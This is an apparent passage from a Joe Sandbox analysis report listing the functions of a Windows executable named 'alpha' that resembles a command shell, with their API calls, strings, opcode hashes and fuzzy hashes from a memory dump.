                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswspacewcschr
                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                                                                        • API String ID: 287713880-1183017076
                                                                                                                                                                        • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                        • Instruction ID: 0f3c64b721cfd2c74ac7cb178ed287ef48692567a4c27faec67ea254b83e6415
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                        • Instruction Fuzzy Hash: 03F04463B28652C1EB61DF71B4042796790FF54F40F459371E95D82354EF2DD448C70A
                                                                                                                                                                        Function 00007FF6E94304F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                        • API String ID: 1646373207-2530943252
                                                                                                                                                                        • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                        • Instruction ID: c85f3de86b036cb412e4dfd513cc92d1be057999f562cd07c8f227b73f191641
                                                                                                                                                                        • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                        • Instruction Fuzzy Hash: 27010CA2E09A06C1EA49DF60A89533823A0AF45770F444735C93E827E0DE3E6448D30A
                                                                                                                                                                        Function 00007FF6E94473C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                        • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                        • API String ID: 1646373207-919018592
                                                                                                                                                                        • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                        • Instruction ID: 879303bdce57081be220346704e39568e07aaa056935504c64b557d5d746009b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F01722A28A91D2EB008F52F444179AA60EF89BD0B48D134DE4E43B24DF2DD489C705
                                                                                                                                                                        Function 00007FF6E9421130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                        • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                                                                                        • Instruction ID: 8ad38b903e8f9b079c184c2ab16aa7460fd6f2ccc089c843bba554d5355a8ee3
                                                                                                                                                                        • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F618633A18B82CAEB20CF6598443AD37A4FF88748F504234DE5D83A99DF39E488C705
                                                                                                                                                                        Function 00007FF6E9434878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmp$wcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3270668897-0
                                                                                                                                                                        • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                                                                                                                        • Instruction ID: 3449684335960348f667fd80a5d01d8fc85f229102757b5bfde7ee772540f907
                                                                                                                                                                        • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E519213E08647C2FB61EF31E4143BA67A1EF55B80F588131CA0E872D5EE2ED949C35A
                                                                                                                                                                        Function 00007FF6E944F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$DriveFullNamePathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3442494845-0
                                                                                                                                                                        • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                                                                                        • Instruction ID: 0e419a2cc110c796e263f3cc3a9f5a93498d58994fd1c2c2254e8e23082c4cda
                                                                                                                                                                        • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                                                                                        • Instruction Fuzzy Hash: 45318833605B82CAEB70CF21E8447E973A4FB88B88F444165EA4D87B54CF39D649C740
                                                                                                                                                                        Function 00007FF6E9438F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                        • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                        • Instruction ID: ec5f7931e08bf8a5c144b2ca98a60e5f235a49b2c9384a899b2e166248c67cee
                                                                                                                                                                        • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                        • Instruction Fuzzy Hash: D141A736A08B42C5EB50AF58F89436973A4FF88754F904136EA8D83764DF3EE588C706
                                                                                                                                                                        Function 00007FF6E9438470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcstol$lstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3515581199-0
                                                                                                                                                                        • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                                                                        • Instruction ID: 102b020dda3e5c6f78ed5cba9d673e975f9b1b4cf65044e928723ee8c7997356
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E21C133A08642C3E765CF79A0982BEAAA0FF99740F115134CB4F82B55DE6EE449C709
                                                                                                                                                                        Function 00007FF6E9424F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File_get_osfhandle$TimeWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4019809305-0
                                                                                                                                                                        • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                        • Instruction ID: cc74e970302297cb8e084bb59ef66d44abd3c1d6049c194e05ac91940806b8cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                                                                        • Instruction Fuzzy Hash: B6318F23A08782C6EBA18F24944433CA7A1BF4AB90F145238DD4D83B95DF3ED849CB09
                                                                                                                                                                        Function 00007FF6E9451914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029679093-0
                                                                                                                                                                        • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                                                                                        • Instruction ID: d76174854c5d93daf8b6f9d006a490a417991de8bc5c74c54fd3ad10354c6f02
                                                                                                                                                                        • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                                                                                        • Instruction Fuzzy Hash: F6314533705B81CAEB318F61D8943E967A1FB89B88F444135CA8D8BB48DF39D649C705
                                                                                                                                                                        Function 00007FF6E944E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2448200120-0
                                                                                                                                                                        • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                        • Instruction ID: 2e5f37370cd4ff91ddd52fd84490beb94a35e796783d37bd7289fa10e6d7268e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F21FB73A18746C6EB159F11A80037EB6A1FF89B81F544139E94E83795CF3EE449CB0A
                                                                                                                                                                        Function 00007FF6E9437CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                        • Instruction ID: 31086827c7193903c486b25dd5bbad5c63f6343762749ca994455b82a7778093
                                                                                                                                                                        • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                        • Instruction Fuzzy Hash: F621A472A08B46C6EA04DF61A9441B97BA1FF89BD0B049230DE5E837A5EF3DE409C705
                                                                                                                                                                        Function 00007FF6E9426A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E9433D0C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D2F
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: iswalpha.MSVCRT ref: 00007FF6E9433D4F
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D75
                                                                                                                                                                          • Part of subcall function 00007FF6E9433C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433DBF
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426ABF
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9426AD3
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B8B
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B97
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B84: RtlFreeHeap.NTDLL ref: 00007FF6E9426BAF
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B39
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: RtlFreeHeap.NTDLL ref: 00007FF6E9426B4D
                                                                                                                                                                          • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B59
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426B03
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9426B17
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3512109576-0
                                                                                                                                                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                        • Instruction ID: 23ce1be0056c7fe227dc4f94e2deeb969b17616cb3320d4c40f024db73ebf4b4
                                                                                                                                                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                        • Instruction Fuzzy Hash: B1218E63A09A86C6EB04DF6594543B87BA0FF59B45F148032CA0EC7355EF3EA44AC31A
                                                                                                                                                                        Function 00007FF6E942B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6D0
                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6E7
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B701
